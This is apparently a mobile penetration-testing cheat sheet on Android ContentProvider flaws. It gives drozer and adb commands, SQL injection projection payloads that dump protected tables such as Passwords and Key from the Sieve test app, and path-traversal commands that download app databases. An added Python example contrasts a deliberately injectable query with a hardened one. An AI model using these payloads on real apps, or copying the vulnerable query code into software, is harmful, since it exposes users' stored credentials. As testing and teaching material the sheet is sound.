3.4.2 ContentProvider

DROZER

Info:

run app.provider.info -a com.x.x.x

Path guessing & determining accessible content:

run scanner.provider.finduris -a com.x.x.x

Query the URIs found above, or guess your own (the same URIs also work with app.provider.insert / .update / .delete):

run app.provider.query content://<URI> --vertical

Test content providers for SQL-Injection:

run scanner.provider.injection -a com.x.x.x

Find tables accessible through SQL-Injection:

run scanner.provider.sqltables -a com.x.x.x

SQLi

List all db tables:

run app.provider.query content://com.x.x.x.ProviderName/path/ --projection "* FROM SQLITE_MASTER WHERE type='table';--"

Trigger an error to see the underlying query:

run app.provider.query content://com.x.x.x.ProviderName/path/ --projection "'"
unrecognized token: "' FROM Passwords" (code 1): , while compiling: SELECT ' FROM Passwords

run app.provider.query content://com.x.x.x.ProviderName/path/ --selection "'"
unrecognized token: "')" (code 1): , while compiling: SELECT * FROM Passwords WHERE (')

Example - retrieve data from otherwise protected tables:

run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection "* FROM Key;--"
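
Why the projection and selection probes above behave as they do, and what the fix looks like (an added example, not part of the original cheat sheet): a Python/sqlite3 model of a provider that pastes both arguments into the statement, next to an allowlisted, parameterized version. Table names follow the Sieve example; the columns, rows and function names are assumptions.

```python
import sqlite3

def make_db():
    # Constructed data. Table names follow the Sieve example; columns are assumed.
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE Passwords (service TEXT, username TEXT, password TEXT);
        CREATE TABLE Key (Password TEXT, pin TEXT);
        INSERT INTO Passwords VALUES ('mail', 'alice', 'constructed-secret');
        INSERT INTO Key VALUES ('constructed-master', '0000');
    """)
    return db

def query_vulnerable(db, projection=None, selection=None):
    # Caller-controlled strings are pasted straight into the statement.
    sql = f"SELECT {', '.join(projection) if projection else '*'} FROM Passwords"
    if selection:
        sql += f" WHERE ({selection})"
    return db.execute(sql).fetchall()

ALLOWED_COLUMNS = ("service", "username")  # hypothetical set exposed to callers

def query_hardened(db, projection=None, filters=None):
    # Column names must match the allowlist exactly; values are bound with "?".
    cols = list(projection) if projection else list(ALLOWED_COLUMNS)
    filters = dict(filters or {})
    for name in cols + list(filters):
        if name not in ALLOWED_COLUMNS:
            raise ValueError(f"column not allowed: {name!r}")
    sql = f"SELECT {', '.join(cols)} FROM Passwords"
    if filters:
        sql += " WHERE " + " AND ".join(f"{c} = ?" for c in filters)
    return db.execute(sql, list(filters.values())).fetchall()

def outcome(fn, *args, **kwargs):
    # Return ("rows", data) or ("error", exception class name) for comparison.
    try:
        return ("rows", fn(*args, **kwargs))
    except (sqlite3.Error, ValueError) as exc:
        return ("error", type(exc).__name__)

if __name__ == "__main__":
    db = make_db()
    for probe in (["* FROM Key;--"], ["'"], ["service"]):
        print(probe, outcome(query_vulnerable, db, probe),
              outcome(query_hardened, db, probe))
```

On Android the corresponding controls are SQLiteQueryBuilder with a projection map and strict mode, plus selectionArgs for values.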

FILESYSTEM-CP

Download db:

run app.provider.download content://com.x.x.x.ProviderName/../../../../../../../../data/data/com.x.x.x/database.db /home/user/database.db

Find content providers that are susceptible to directory traversal:

run scanner.provider.traversal -a com.x.x.x
run app.provider.read content://com.x.x.x.ProviderName/path/to/file

Example (/etc/hosts is world-readable -> no biggy)

run app.provider.read content://com.mwr.example.sieve.FileBackupProvider/etc/hosts

or

run app.provider.download content://com.mwr.example.sieve.FileBackupProvider/data/data/com.mwr.example.sieve/databases/database.db /home/user/database.db

ADB

adb shell content query --uri content://com.x.x.x.ProviderName/file_or_path

THINGS TO REPORT

  • Improper use of permissions (no path permissions, no READ/WRITE permissions)

  • If SQL Injection is possible

    • If a weak hash function (like MD5) was used on passwords or other sensitive data

  • Accessed db-files
